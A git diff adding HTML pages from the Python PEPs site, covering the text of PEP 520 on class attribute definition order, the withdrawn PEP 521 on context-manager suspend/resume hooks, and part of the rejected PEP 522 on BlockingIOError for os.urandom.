This PEP changes that by preserving the order in which attributes +are introduced in the class definition body. That order will now be +preserved in the __definition_order__ attribute of the class. +This allows introspection of the original definition order, e.g. by +class decorators.

+

Additionally, this PEP requires that the default class definition +namespace be ordered (e.g. OrderedDict) by default. The +long-lived class namespace (__dict__) will remain a dict.

+
+
+

Motivation

+

The attribute order from a class definition may be useful to tools +that rely on name order. However, without the automatic availability +of the definition order, those tools must impose extra requirements on +users. For example, use of such a tool may require that your class use +a particular metaclass. Such requirements are often enough to +discourage use of the tool.

+

Some tools that could make use of this PEP include:

+
    +
  • documentation generators
  • +
  • testing frameworks
  • +
  • CLI frameworks
  • +
  • web frameworks
  • +
  • config generators
  • +
  • data serializers
  • +
  • enum factories (my original motivation)
  • +
+
+
+

Background

+

When a class is defined using a class statement, the class body +is executed within a namespace. Currently that namespace defaults to +dict. If the metaclass defines __prepare__() then the result +of calling it is used for the class definition namespace.

+

After the execution completes, the definition namespace is +copied into a new dict. Then the original definition namespace is +discarded. The new copy is stored away as the class’s namespace and +is exposed as __dict__ through a read-only proxy.

+

The class attribute definition order is represented by the insertion +order of names in the definition namespace. Thus, we can have +access to the definition order by switching the definition namespace +to an ordered mapping, such as collections.OrderedDict. This is +feasible using a metaclass and __prepare__, as described above. +In fact, exactly this is by far the most common use case for using +__prepare__.
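
+

A minimal sketch of that metaclass approach (the names are invented for illustration):

+
from collections import OrderedDict
+
+class OrderedMeta(type):
+    @classmethod
+    def __prepare__(mcls, name, bases, **kwargs):
+        # Use an ordered mapping as the class definition namespace.
+        return OrderedDict()
+
+    def __new__(mcls, name, bases, namespace, **kwargs):
+        cls = super().__new__(mcls, name, bases, dict(namespace))
+        # Capture the insertion order before the namespace is discarded.
+        cls._order = tuple(namespace)
+        return cls
+
+class Spam(metaclass=OrderedMeta):
+    ham = None
+    eggs = 5
+
+print(Spam._order)  # ('__module__', '__qualname__', 'ham', 'eggs')
+
+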

+

At that point, the only missing thing for later access to the +definition order is storing it on the class before the definition +namespace is thrown away. Again, this may be done using a metaclass. +However, this means that the definition order is preserved only for +classes that use such a metaclass. There are two practical problems +with that:

+

First, it requires the use of a metaclass. Metaclasses introduce an +extra level of complexity to code and in some cases (e.g. conflicts) +are a problem. So reducing the need for them is worth doing when the +opportunity presents itself. PEP 422 and PEP 487 discuss this at +length. We have such an opportunity by using an ordered mapping (e.g. +OrderedDict for CPython at least) for the default class definition +namespace, virtually eliminating the need for __prepare__().

+

Second, only classes that opt in to using the OrderedDict-based +metaclass will have access to the definition order. This is problematic +for cases where universal access to the definition order is important.

+
+
+

Specification

+

Part 1:

+
    +
  • all classes have a __definition_order__ attribute
  • +
  • __definition_order__ is a tuple of identifiers (or None)
  • +
  • __definition_order__ is always set:
      +
    1. during execution of the class body, the insertion order of names +into the class definition namespace is stored in a tuple
    2. +
    3. if __definition_order__ is defined in the class body then it +must be a tuple of identifiers or None; any other value +will result in TypeError
    4. +
    5. classes that do not have a class definition (e.g. builtins) have +their __definition_order__ set to None
    6. +
    7. classes for which __prepare__() returned something other than +OrderedDict (or a subclass) have their __definition_order__ +set to None (except where #2 applies)
    8. +
    +
  • +
+

Not changing:

+
    +
  • dir() will not depend on __definition_order__
  • +
  • descriptors and custom __getattribute__ methods are unconstrained +regarding __definition_order__
  • +
+

Part 2:

+
    +
  • the default class definition namespace is now an ordered mapping (e.g. OrderedDict)
  • +
  • cls.__dict__ does not change, remaining a read-only proxy around +dict
  • +
+

Note that Python implementations which have an ordered dict won’t +need to change anything.

+

The following code demonstrates roughly equivalent semantics for both +parts 1 and 2:

+
from collections import OrderedDict
+
+class Meta(type):
+    @classmethod
+    def __prepare__(cls, *args, **kwargs):
+        return OrderedDict()
+
+class Spam(metaclass=Meta):
+    ham = None
+    eggs = 5
+    __definition_order__ = tuple(locals())
+
+
+
+

Why a tuple?

+

Use of a tuple reflects the fact that we are exposing the order in +which attributes on the class were defined. Since the definition +is already complete by the time __definition_order__ is set, the +content and order of the value won’t be changing. Thus we use a type +that communicates that state of immutability.

+
+
+

Why not a read-only attribute?

+

There are some valid arguments for making __definition_order__ +a read-only attribute (like cls.__dict__ is). Most notably, a +read-only attribute conveys the nature of the attribute as “complete”, +which is exactly correct for __definition_order__. Since it +represents the state of a particular one-time event (execution of +the class definition body), allowing the value to be replaced would +reduce confidence that the attribute corresponds to the original class +body. Furthermore, often an immutable-by-default approach helps to +make data easier to reason about.

+

However, in this case there still isn’t a strong reason to counter +the well-worn precedent found in Python. Per Guido:

+
I don't see why it needs to be a read-only attribute. There are
+very few of those -- in general we let users play around with
+things unless we have a hard reason to restrict assignment (e.g.
+the interpreter's internal state could be compromised). I don't
+see such a hard reason here.
+
+
+

Also, note that a writeable __definition_order__ allows dynamically +created classes (e.g. by Cython) to still have __definition_order__ +properly set. That could certainly be handled through specific +class-creation tools, such as type() or the C-API, without the need +to lose the semantics of a read-only attribute. However, with a +writeable attribute it’s a moot point.

+
+
+

Why not “__attribute_order__”?

+

__definition_order__ is centered on the class definition body. The use cases for dealing with the class namespace (__dict__) post-definition are a separate matter. __attribute_order__ would be a significantly misleading name, since it suggests a feature covering more than just the class definition.

+
+
+

Why not ignore “dunder” names?

+

Names starting and ending with “__” are reserved for use by the +interpreter. In practice they should not be relevant to the users of +__definition_order__. Instead, for nearly everyone they would only +be clutter, causing the same extra work (filtering out the dunder +names) for the majority. In cases where a dunder name is significant, +the class definition could manually set __definition_order__, +making the common case simpler.

+

However, leaving dunder names out of __definition_order__ means +that their place in the definition order would be unrecoverably lost. +Dropping dunder names by default may inadvertently cause problems for +classes that use dunder names unconventionally. In this case it’s +better to play it safe and preserve all the names from the class +definition. This isn’t a big problem since it is easy to filter out +dunder names:

+
(name for name in cls.__definition_order__
+      if not (name.startswith('__') and name.endswith('__')))
+
+
+

In fact, in some application contexts there may be other criteria on +which similar filtering would be applied, such as ignoring any name +starting with “_”, leaving out all methods, or including only +descriptors. Ultimately dunder names aren’t a special enough case to +be treated exceptionally.

+

Note that a couple of dunder names (__name__ and __qualname__) +are injected by default by the compiler. So they will be included even +though they are not strictly part of the class definition body.

+
+
+

Why None instead of an empty tuple?

+

A key objective of adding __definition_order__ is to preserve +information in class definitions which was lost prior to this PEP. +One consequence is that __definition_order__ implies an original +class definition. Using None allows us to clearly distinguish +classes that do not have a definition order. An empty tuple clearly +indicates a class that came from a definition statement but did not +define any attributes there.

+
+
+

Why None instead of not setting the attribute?

+

The absence of an attribute requires more complex handling than None +does for consumers of __definition_order__.

+
+
+

Why constrain manually set values?

+

If __definition_order__ is manually set in the class body then it +will be used. We require it to be a tuple of identifiers (or None) +so that consumers of __definition_order__ may have a consistent +expectation for the value. That helps maximize the feature’s +usefulness.

+

We could also allow an arbitrary iterable for a manually set __definition_order__ and convert it into a tuple. However, not all iterables imply a definition order (e.g. set). So we opt in favor of requiring a tuple.

+
+
+

Why not hide __definition_order__ on non-type objects?

+

Python doesn’t make much effort to hide class-specific attributes +during lookup on instances of classes. While it may make sense +to consider __definition_order__ a class-only attribute, hidden +during lookup on objects, setting precedent in that regard is +beyond the goals of this PEP.

+
+
+

What about __slots__?

+

__slots__ will be added to __definition_order__ like any +other name in the class definition body. The actual slot names +will not be added to __definition_order__ since they aren’t +set as names in the definition namespace.

+
+
+

Why is __definition_order__ even necessary?

+

Since the definition order is not preserved in __dict__, it is +lost once class definition execution completes. Classes could +explicitly set the attribute as the last thing in the body. However, +then independent decorators could only make use of classes that had done +so. Instead, __definition_order__ preserves this one bit of info +from the class body so that it is universally available.
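
+

As the note at the top of this PEP explains, the compact dict in CPython 3.6+ means cls.__dict__ itself now preserves this order, so a decorator today can sketch the same idea without __definition_order__ (the decorator name is invented):

+
def record_order(cls):
+    # On CPython 3.6+, the class namespace preserves definition order,
+    # which is roughly what __definition_order__ would have exposed.
+    cls._field_order = tuple(
+        name for name in vars(cls)
+        if not (name.startswith("__") and name.endswith("__"))
+    )
+    return cls
+
+@record_order
+class Point:
+    x = 0
+    y = 0
+
+print(Point._field_order)  # -> ('x', 'y')
+
+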

+
+
+
+

Support for C-API Types

+

Arguably, most C-defined Python types (e.g. built-in, extension modules) have a roughly equivalent concept of a definition order. So conceivably __definition_order__ could be set for such types automatically. This PEP does not introduce any such support. However, it does not prohibit it either. In any case, since __definition_order__ can be set at any time through normal attribute assignment, it does not need any special treatment in the C-API.

+

The specific cases:

+
    +
  • builtin types
  • +
  • PyType_Ready
  • +
  • PyType_FromSpec
  • +
+
+
+

Compatibility

+

This PEP does not break backward compatibility, except in the case that +someone relies strictly on dict as the class definition namespace. +This shouldn’t be a problem since issubclass(OrderedDict, dict) is +true.

+
+
+

Changes

+

In addition to the class syntax, the following expose the new behavior:

+
    +
  • builtins.__build_class__
  • +
  • types.prepare_class
  • +
  • types.new_class
  • +
+

Also, the 3-argument form of builtins.type() will allow inclusion +of __definition_order__ in the namespace that gets passed in. It +will be subject to the same constraints as when __definition_order__ +is explicitly defined in the class body.

+
+
+

Other Python Implementations

+

Pending feedback, the impact on Python implementations is expected to +be minimal. All conforming implementations are expected to set +__definition_order__ as described in this PEP.

+
+
+

Implementation

+

The implementation is found in the +tracker.

+
+
+

Alternatives

+
+

An Order-preserving cls.__dict__

+

Instead of storing the definition order in __definition_order__, +the now-ordered definition namespace could be copied into a new +OrderedDict. This would then be used as the mapping proxied as +__dict__. Doing so would mostly provide the same semantics.

+

However, using OrderedDict for __dict__ would obscure the +relationship with the definition namespace, making it less useful.

+

Additionally, (in the case of OrderedDict specifically) doing +this would require significant changes to the semantics of the +concrete dict C-API.

+

There has been some discussion about moving to a compact dict implementation which would (mostly) preserve insertion order. However, the lack of an explicit __definition_order__ would remain a pain point.

+
+
+

A “namespace” Keyword Arg for Class Definition

+

PEP 422 proposed a new "namespace" keyword arg for class definitions that effectively replaces the need for __prepare__(). However, that proposal was withdrawn in favor of the simpler PEP 487.

+
+
+

A stdlib Metaclass that Implements __prepare__() with OrderedDict

+

This has all the same problems as writing your own metaclass. The +only advantage is that you don’t have to actually write this +metaclass. So it doesn’t offer any benefit in the context of this +PEP.

+
+
+

Set __definition_order__ at Compile-time

+

Each class’s __qualname__ is determined at compile-time. +This same concept could be applied to __definition_order__. +The result of composing __definition_order__ at compile-time +would be nearly the same as doing so at run-time.

+

Comparative implementation difficulty aside, the key difference +would be that at compile-time it would not be practical to +preserve definition order for attributes that are set dynamically +in the class body (e.g. locals()[name] = value). However, +they should still be reflected in the definition order. One +possible resolution would be to require class authors to manually +set __definition_order__ if they define any class attributes +dynamically.
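A sketch of the dynamic case in question (names hypothetical; relies on CPython class bodies exposing their real namespace via locals()):

class Handlers:
    # These assignments go through the namespace mapping rather than
    # ordinary assignment statements, so a compile-time approach could
    # not see them.
    for _name in ('on_open', 'on_close'):
        locals()[_name] = (lambda self, _n=_name: _n)

assert Handlers().on_open() == 'on_open'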

+

Ultimately, the choice between using OrderedDict at run-time and discovering the order at compile-time is almost entirely an implementation detail.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0520.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0521/index.html b/pep-0521/index.html new file mode 100644 index 00000000000..3048f707512 --- /dev/null +++ b/pep-0521/index.html @@ -0,0 +1,488 @@ + + + + + + + + PEP 521 – Managing global context via ‘with’ blocks in generators and coroutines | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 521 – Managing global context via ‘with’ blocks in generators and coroutines

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2015
+
Python-Version:
+
3.6
+
Post-History:
+
29-Apr-2015
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

Withdrawn in favor of PEP 567.

+
+
+

Abstract

+

While we generally try to avoid global state when possible, there +nonetheless exist a number of situations where it is agreed to be the +best approach. In Python, a standard pattern for handling such cases +is to store the global state in global or thread-local storage, and +then use with blocks to limit modifications of this global state +to a single dynamic scope. Examples where this pattern is used include +the standard library’s warnings.catch_warnings and +decimal.localcontext, NumPy’s numpy.errstate (which exposes +the error-handling settings provided by the IEEE 754 floating point +standard), and the handling of logging context or HTTP request context +in many server application frameworks.

+

However, there is currently no ergonomic way to manage such local +changes to global state when writing a generator or coroutine. For +example, this code:

+
def f():
+    with warnings.catch_warnings():
+        for x in g():
+            yield x
+
+
+

may or may not successfully catch warnings raised by g(), and may +or may not inadvertently swallow warnings triggered elsewhere in the +code. The context manager, which was intended to apply only to f +and its callees, ends up having a dynamic scope that encompasses +arbitrary and unpredictable parts of its callers. This problem +becomes particularly acute when writing asynchronous code, where +essentially all functions become coroutines.

+

Here, we propose to solve this problem by notifying context managers +whenever execution is suspended or resumed within their scope, +allowing them to restrict their effects appropriately.

+
+
+

Specification

+

Two new, optional, methods are added to the context manager protocol: +__suspend__ and __resume__. If present, these methods will be +called whenever a frame’s execution is suspended or resumed from +within the context of the with block.

+

More formally, consider the following code:

+
with EXPR as VAR:
+    PARTIAL-BLOCK-1
+    f((yield foo))
+    PARTIAL-BLOCK-2
+
+
+

Currently this is equivalent to the following code (copied from PEP 343):

+
mgr = (EXPR)
+exit = type(mgr).__exit__  # Not calling it yet
+value = type(mgr).__enter__(mgr)
+exc = True
+try:
+    try:
+        VAR = value  # Only if "as VAR" is present
+        PARTIAL-BLOCK-1
+        f((yield foo))
+        PARTIAL-BLOCK-2
+    except:
+        exc = False
+        if not exit(mgr, *sys.exc_info()):
+            raise
+finally:
+    if exc:
+        exit(mgr, None, None, None)
+
+
+

This PEP proposes to modify with block handling to instead become:

+
mgr = (EXPR)
+exit = type(mgr).__exit__  # Not calling it yet
+### --- NEW STUFF ---
+if the_block_contains_yield_points:  # known statically at compile time
+    suspend = getattr(type(mgr), "__suspend__", lambda mgr: None)
+    resume = getattr(type(mgr), "__resume__", lambda mgr: None)
+### --- END OF NEW STUFF ---
+value = type(mgr).__enter__(mgr)
+exc = True
+try:
+    try:
+        VAR = value  # Only if "as VAR" is present
+        PARTIAL-BLOCK-1
+        ### --- NEW STUFF ---
+        suspend(mgr)
+        tmp = yield foo
+        resume(mgr)
+        f(tmp)
+        ### --- END OF NEW STUFF ---
+        PARTIAL-BLOCK-2
+    except:
+        exc = False
+        if not exit(mgr, *sys.exc_info()):
+            raise
+finally:
+    if exc:
+        exit(mgr, None, None, None)
+
+
+

Analogous suspend/resume calls are also wrapped around the yield +points embedded inside the yield from, await, async with, +and async for constructs.

+
+

Nested blocks

+

Given this code:

+
def f():
+    with OUTER:
+        with INNER:
+            yield VALUE
+
+
+

then we perform the following operations in the following sequence:

+
INNER.__suspend__()
+OUTER.__suspend__()
+yield VALUE
+OUTER.__resume__()
+INNER.__resume__()
+
+
+

Note that this ensures that the following is a valid refactoring:

+
def f():
+    with OUTER:
+        yield from g()
+
+def g():
+    with INNER:
+        yield VALUE
+
+
+

Similarly, with statements with multiple context managers suspend +from right to left, and resume from left to right.
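For example, given "with OUTER, INNER:" around a yield point, the resulting sequence matches the nested form above:

INNER.__suspend__()
OUTER.__suspend__()
yield VALUE
OUTER.__resume__()
INNER.__resume__()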

+
+
+

Other changes

+

Appropriate __suspend__ and __resume__ methods are added to +warnings.catch_warnings and decimal.localcontext.
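As a hedged illustration of what such methods could look like (this class is a simplified sketch, not the actual stdlib patch), consider a manager that confines warning-filter changes to its own frame's execution:

import warnings

class catch_warnings_locally:
    def __enter__(self):
        self._outer = warnings.filters[:]  # save the caller's filters
        return self

    def __exit__(self, *exc_info):
        warnings.filters[:] = self._outer  # restore them on exit
        return False

    def __suspend__(self):
        # The frame is yielding: stash our filters, reinstate the caller's.
        self._inner = warnings.filters[:]
        warnings.filters[:] = self._outer

    def __resume__(self):
        # The frame resumed: re-save the caller's filters, reinstate ours.
        self._outer = warnings.filters[:]
        warnings.filters[:] = self._inner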

+
+
+
+

Rationale

+

In the abstract, we gave an example of plausible but incorrect code:

+
def f():
+    with warnings.catch_warnings():
+        for x in g():
+            yield x
+
+
+

To make this correct in current Python, we need to instead write +something like:

+
def f():
+    with warnings.catch_warnings():
+        it = iter(g())
+    while True:
+        with warnings.catch_warnings():
+            try:
+                x = next(it)
+            except StopIteration:
+                break
+        yield x
+
+
+

OTOH, if this PEP is accepted then the original code will become +correct as-is. Or if this isn’t convincing, then here’s another +example of broken code; fixing it requires even greater gyrations, and +these are left as an exercise for the reader:

+
async def test_foo_emits_warning():
+    with warnings.catch_warnings(record=True) as w:
+        await foo()
+    assert len(w) == 1
+    assert "xyzzy" in w[0].message
+
+
+

And notice that this last example isn’t artificial at all – this is +exactly how you write a test that an async/await-using coroutine +correctly raises a warning. Similar issues arise for pretty much any +use of warnings.catch_warnings, decimal.localcontext, or +numpy.errstate in async/await-using code. So there’s clearly a +real problem to solve here, and the growing prominence of async code +makes it increasingly urgent.

+
+

Alternative approaches

+

The main alternative that has been proposed is to create some kind of +“task-local storage”, analogous to “thread-local storage” +[1]. In essence, the idea would be that the +event loop would take care to allocate a new “task namespace” for each +task it schedules, and provide an API to at any given time fetch the +namespace corresponding to the currently executing task. While there +are many details to be worked out [2], the basic +idea seems doable, and it is an especially natural way to handle the +kind of global context that arises at the top-level of async +application frameworks (e.g., setting up context objects in a web +framework). But it also has a number of flaws:

+
• It only solves the problem of managing global state for coroutines that yield back to an asynchronous event loop. But there actually isn't anything about this problem that's specific to asyncio – as shown in the examples above, simple generators run into exactly the same issue.
• It creates an unnecessary coupling between event loops and code that needs to manage global state. Obviously an async web framework needs to interact with some event loop API anyway, so it's not a big deal in that case. But it's weird that warnings or decimal or NumPy should have to call into an async library's API to access their internal state when they themselves involve no async code. Worse, since there are multiple event loop APIs in common use, it isn't clear how to choose which to integrate with. (This could be somewhat mitigated by CPython providing a standard API for creating and switching "task-local domains" that asyncio, Twisted, tornado, etc. could then work with.)
• It's not at all clear that this can be made acceptably fast. NumPy has to check the floating point error settings on every single arithmetic operation. Checking a piece of data in thread-local storage is absurdly quick, because modern platforms have put massive resources into optimizing this case (e.g. dedicating a CPU register for this purpose); calling a method on an event loop to fetch a handle to a namespace and then doing lookup in that namespace is much slower.
  More importantly, this extra cost would be paid on every access to the global data, even for programs which are not otherwise using an event loop at all. This PEP's proposal, by contrast, only affects code that actually mixes with blocks and yield statements, meaning that the users who experience the costs are the same users who also reap the benefits.
+

On the other hand, such tight integration between task context and the +event loop does potentially allow other features that are beyond the +scope of the current proposal. For example, an event loop could note +which task namespace was in effect when a task called call_soon, +and arrange that the callback when run would have access to the same +task namespace. Whether this is useful, or even well-defined in the +case of cross-thread calls (what does it mean to have task-local +storage accessed from two threads simultaneously?), is left as a +puzzle for event loop implementors to ponder – nothing in this +proposal rules out such enhancements as well. It does seem though +that such features would be useful primarily for state that already +has a tight integration with the event loop – while we might want a +request id to be preserved across call_soon, most people would not +expect:

+
with warnings.catch_warnings():
+    loop.call_soon(f)
+
+
+

to result in f being run with warnings disabled, which would be +the result if call_soon preserved global context in general. It’s +also unclear how this would even work given that the warnings context +manager __exit__ would be called before f.

+

So this PEP takes the position that __suspend__/__resume__ +and “task-local storage” are two complementary tools that are both +useful in different circumstances.

+
+
+
+

Backwards compatibility

+

Because __suspend__ and __resume__ are optional and default to +no-ops, all existing context managers continue to work exactly as +before.

+

Speed-wise, this proposal adds additional overhead when entering a +with block (where we must now check for the additional methods; +failed attribute lookup in CPython is rather slow, since it involves +allocating an AttributeError), and additional overhead at +suspension points. Since the position of with blocks and +suspension points is known statically, the compiler can +straightforwardly optimize away this overhead in all cases except +where one actually has a yield inside a with. Furthermore, +because we only do attribute checks for __suspend__ and +__resume__ once at the start of a with block, when these +attributes are undefined then the per-yield overhead can be optimized +down to a single C-level if (frame->needs_suspend_resume_calls) { +... }. Therefore, we expect the overall overhead to be negligible.

+
+
+

Interaction with PEP 492

+

PEP 492 added new asynchronous context managers, which are like +regular context managers, but instead of having regular methods +__enter__ and __exit__ they have coroutine methods +__aenter__ and __aexit__.

+

Following this pattern, one might expect this proposal to add +__asuspend__ and __aresume__ coroutine methods. But this +doesn’t make much sense, since the whole point is that __suspend__ +should be called before yielding our thread of execution and allowing +other code to run. The only thing we accomplish by making +__asuspend__ a coroutine is to make it possible for +__asuspend__ itself to yield. So either we need to recursively +call __asuspend__ from inside __asuspend__, or else we need to +give up and allow these yields to happen without calling the suspend +callback; either way it defeats the whole point.

+

Well, with one exception: one possible pattern for coroutine code is to call yield in order to communicate with the coroutine runner, but without actually suspending their execution (i.e., the coroutine might know that the coroutine runner will resume them immediately after processing the yielded message). An example of this is the curio.timeout_after async context manager, which yields a special set_timeout message to the curio kernel, and then the kernel immediately (synchronously) resumes the coroutine which sent the message. And from the user point of view, this timeout value acts just like the kinds of global variables that motivated this PEP. But, there is a crucial difference: this kind of async context manager is, by definition, tightly integrated with the coroutine runner. So, the coroutine runner can take over responsibility for keeping track of which timeouts apply to which coroutines without any need for this PEP at all (and this is indeed how curio.timeout_after works).

+

That leaves two reasonable approaches to handling async context managers:

+
1. Add plain __suspend__ and __resume__ methods.
2. Leave async context managers alone for now until we have more experience with them.
+

Either seems plausible, so out of laziness / YAGNI this PEP tentatively +proposes to stick with option (2).

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0521.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0522/index.html b/pep-0522/index.html new file mode 100644 index 00000000000..a6f7640e36a --- /dev/null +++ b/pep-0522/index.html @@ -0,0 +1,863 @@ + + + + + + + + PEP 522 – Allow BlockingIOError in security sensitive APIs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 522 – Allow BlockingIOError in security sensitive APIs

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, Nathaniel J. Smith <njs at pobox.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
506
+
Created:
+
16-Jun-2016
+
Python-Version:
+
3.6
+
Resolution:
+
Security-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

A number of APIs in the standard library that return random values nominally +suitable for use in security sensitive operations currently have an obscure +operating system dependent failure mode that allows them to return values that +are not, in fact, suitable for such operations.

+

This is due to some operating system kernels (most notably the Linux kernel) +permitting reads from /dev/urandom before the system random number +generator is fully initialized, whereas most other operating systems will +implicitly block on such reads until the random number generator is ready.

+

For the lower level os.urandom and random.SystemRandom APIs, this PEP +proposes changing such failures in Python 3.6 from the current silent, +hard to detect, and hard to debug, errors to easily detected and debugged errors +by raising BlockingIOError with a suitable error message, allowing +developers the opportunity to unambiguously specify their preferred approach +for handling the situation.

+

For the new high level secrets API, it proposes to block implicitly if needed whenever a random number is generated by that module, as well as to expose a new secrets.wait_for_system_rng() function to allow code otherwise using the low level APIs to explicitly wait for the system random number generator to be available.

+

This change will impact any operating system that offers the getrandom() +system call, regardless of whether the default behaviour of the +/dev/urandom device is to return potentially predictable results when the +system random number generator is not ready (e.g. Linux, NetBSD) or to block +(e.g. FreeBSD, Solaris, Illumos). Operating systems that prevent execution of +userspace code prior to the initialization of the system random number +generator, or do not offer the getrandom() syscall, will be entirely +unaffected by the proposed change (e.g. Windows, Mac OS X, OpenBSD).

+

The new exception or the blocking behaviour in the secrets module would +potentially be encountered in the following situations:

+
• Python code calling these APIs during Linux system initialization
• Python code running on improperly initialized Linux systems (e.g. embedded hardware without adequate sources of entropy to seed the system random number generator, or Linux VMs that aren't configured to accept entropy from the VM host)
+
+
+

Relationship with other PEPs

+

This PEP depends on the Accepted PEP 506, which adds the secrets module.

+

This PEP competes with Victor Stinner’s PEP 524, which proposes to make +os.urandom itself implicitly block when the system RNG is not ready.

+
+
+

PEP Rejection

+

For the reference implementation, Guido rejected this PEP in favour of the +unconditional implicit blocking proposal in PEP 524 (which brings CPython’s +behaviour on Linux into line with its behaviour on other operating systems).

+

This means any further discussion of appropriate default behaviour for +os.urandom() in system Python installations in Linux distributions should +take place on the respective distro mailing lists, rather than on the upstream +CPython mailing lists.

+
+
+

Changes independent of this PEP

+

CPython interpreter initialization and random module initialization have +already been updated to gracefully fall back to alternative seeding options if +the system random number generator is not ready.

+

This PEP does not compete with the proposal in PEP 524 to add an +os.getrandom() API to expose the getrandom syscall on platforms that +offer it. There is sufficient motive for adding that API in the os module’s +role as a thin wrapper around potentially platform dependent operating system +features that it can be added regardless of what happens to the default +behaviour of os.urandom() on these systems.

+
+
+

Proposal

+
+

Changing os.urandom() on platforms with the getrandom() system call

+

This PEP proposes that in Python 3.6+, os.urandom() be updated to call +the getrandom() syscall in non-blocking mode if available and raise +BlockingIOError: system random number generator is not ready; see secrets.token_bytes() +if the kernel reports that the call would block.

+

This behaviour will then propagate through to the existing +random.SystemRandom, which provides a relatively thin wrapper around +os.urandom() that matches the random.Random() API.

+

However, the new secrets module introduced by PEP 506 will be updated to +catch the new exception and implicitly wait for the system random number +generator if the exception is ever encountered.

+

In all cases, as soon as a call to one of these security sensitive APIs +succeeds, all future calls to these APIs in that process will succeed +without blocking (once the operating system random number generator is ready +after system boot, it remains ready).

+

On Linux and NetBSD, this will replace the previous behaviour of returning +potentially predictable results read from /dev/urandom.

+

On FreeBSD, Solaris, and Illumos, this will replace the previous behaviour of +implicitly blocking until the system random number generator is ready. However, +it is not clear if these operating systems actually allow userspace code (and +hence Python) to run before the system random number generator is ready.

+

Note that in all cases, if calling the underlying getrandom() API reports +ENOSYS rather than returning a successful response or reporting EAGAIN, +CPython will continue to fall back to reading from /dev/urandom directly.

+
+
+

Adding secrets.wait_for_system_rng()

+

A new exception shouldn’t be added without a straightforward recommendation +for how to resolve that error when encountered (however rare encountering +the new error is expected to be in practice). For security sensitive code that +actually does need to use the lower level interfaces to the system random +number generator (rather than the new secrets module), and does receive +live bug reports indicating this is a real problem for the userbase of that +particular application rather than a theoretical one, this PEP’s recommendation +will be to add the following snippet (directly or indirectly) to the +__main__ module:

+
import secrets
+secrets.wait_for_system_rng()
+
+
+

Or, if compatibility with versions prior to Python 3.6 is needed:

+
try:
+    import secrets
+except ImportError:
+    pass
+else:
+    secrets.wait_for_system_rng()
+
+
+

Within the secrets module itself, this will then be used in +token_bytes() to block implicitly if the new exception is encountered:

+
def token_bytes(nbytes=None):
+    if nbytes is None:
+        nbytes = DEFAULT_ENTROPY
+    try:
+        result = os.urandom(nbytes)
+    except BlockingIOError:
+        wait_for_system_rng()
+        result = os.urandom(nbytes)
+    return result
+
+
+

Other parts of the module will then be updated to use token_bytes() as +their basic random number generation building block, rather than calling +os.urandom() directly.

+

Application frameworks covering use cases where access to the system random +number generator is almost certain to be needed (e.g. web frameworks) may +choose to incorporate a call to secrets.wait_for_system_rng() implicitly +into the commands that start the application such that existing calls to +os.urandom() will be guaranteed to never raise the new exception when using +those frameworks.

+

For cases where the error is encountered for an application which cannot be +modified directly, then the following command can be used to wait for the +system random number generator to initialize before starting that application:

+
python3 -c "import secrets; secrets.wait_for_system_rng()"
+
+
+

For example, this snippet could be added to a shell script or a systemd ExecStartPre hook (and may prove useful in reliably waiting for the system random number generator to be ready, even if the subsequent command is not itself an application running under Python 3.6).

+

Given the changes proposed to os.urandom() above, and the inclusion of +an os.getrandom() API on systems that support it, the suggested +implementation of this function would be:

+
if hasattr(os, "getrandom"):
+    # os.getrandom() always blocks waiting for the system RNG by default
+    def wait_for_system_rng():
+        """Block waiting for system random number generator to be ready"""
+        os.getrandom(1)
+        return
+else:
+    # As far as we know, other platforms will never get BlockingIOError
+    # below, but the implementation makes pessimistic assumptions
+    def wait_for_system_rng():
+        """Block waiting for system random number generator to be ready"""
+        # If the system RNG is already seeded, don't wait at all
+        try:
+            os.urandom(1)
+            return
+        except BlockingIOError:
+            pass
+        # Avoid the below busy loop if possible
+        try:
+            block_on_system_rng = open("/dev/random", "rb")
+        except FileNotFoundError:
+            pass
+        else:
+            with block_on_system_rng:
+                block_on_system_rng.read(1)
+        # Busy loop until the system RNG is ready
+        while True:
+            try:
+                os.urandom(1)
+                break
+            except BlockingIOError:
+                # Only check once per millisecond
+                time.sleep(0.001)
+
+
+

On systems where it is possible to wait for the system RNG to be ready, this +function will do so without a busy loop if os.getrandom() is defined, +os.urandom() itself implicitly blocks, or the /dev/random device is +available. If the system random number generator is ready, this call is +guaranteed to never block, even if the system’s /dev/random device uses +a design that permits it to block intermittently during normal system operation.

+
+
+

Limitations on scope

+

No changes are proposed for Windows or Mac OS X systems, as neither of those +platforms provides any mechanism to run Python code before the operating +system random number generator has been initialized. Mac OS X goes so far as +to kernel panic and abort the boot process if it can’t properly initialize the +random number generator (although Apple’s restrictions on the supported +hardware platforms make that exceedingly unlikely in practice).

+

Similarly, no changes are proposed for other *nix systems that do not offer +the getrandom() syscall. On these systems, os.urandom() will continue +to block waiting for the system random number generator to be initialized.

+

While other *nix systems that offer a non-blocking API (other than +getrandom()) for requesting random numbers suitable for use in security +sensitive applications could potentially receive a similar update to the one +proposed for getrandom() in this PEP, such changes are out of scope for +this particular proposal.

+

Python’s behaviour on older versions of affected platforms that do not offer +the new getrandom() syscall will also remain unchanged.

+
+
+
+

Rationale

+
+

Ensuring the secrets module implicitly blocks when needed

+

This is done so that the simplest possible answer to the right way to generate security sensitive random numbers can be "Use the secrets module when available, or your application might crash unexpectedly", rather than the more boilerplate heavy "Always call secrets.wait_for_system_rng() when available, or your application might crash unexpectedly".

+

